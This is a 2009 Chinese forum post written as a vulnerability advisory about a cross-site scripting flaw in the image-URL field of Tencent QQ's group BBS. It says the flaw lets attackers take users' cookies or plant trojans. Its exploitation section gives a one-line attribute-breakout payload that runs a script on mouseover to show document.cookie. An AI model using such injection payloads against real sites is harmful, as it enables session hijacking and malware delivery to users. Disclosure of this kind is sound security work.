设为首页收藏本站

新微赢技术网

 找回密码
 注册
搜索
热搜: 回贴
查看: 10004|回复: 1
打印 上一主题 下一主题

QQ群BBS跨站实战

[复制链接]
跳转到指定楼层
1#
发表于 2009-11-23 00:36:23 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
厂商名字:QQ腾讯
厂商地址:[url=http://www.QQ.com/]http://www.QQ.com/
漏洞程序:QQ
漏洞类型:跨站
影响版本:俱有群BBS功能版本

漏洞描述:
  目前所涉及版本的QQ群BBS发新贴的图片地址处没有做好过滤,导致跨站脚本漏洞攻击的产生,使得用户可以得到QQ用户的COOKIE 信息,或者挂马,从而进一步危害QQ用户。

漏洞利用:
  进入某群的BBS,点击发表新贴,在发贴窗口中,标题与内容随填,我们在图片地址处插入跨站脚本,比如插入:
http://"onmouseover="javascript:alert(document.cookie);"alt="点我呀!""width='800'height='1024'
您需要登录后才可以回帖 登录 | 注册

本版积分规则

申请友链|小黑屋|最新主题|手机版|新微赢技术网 ( 苏ICP备08020429号 )  

GMT+8, 2024-11-18 23:42 , Processed in 0.141289 second(s), 10 queries , Gzip On, Memcache On.

Powered by xuexi

© 2001-2013 HaiAn.Com.Cn Inc. 寰耽

快速回复 返回顶部 返回列表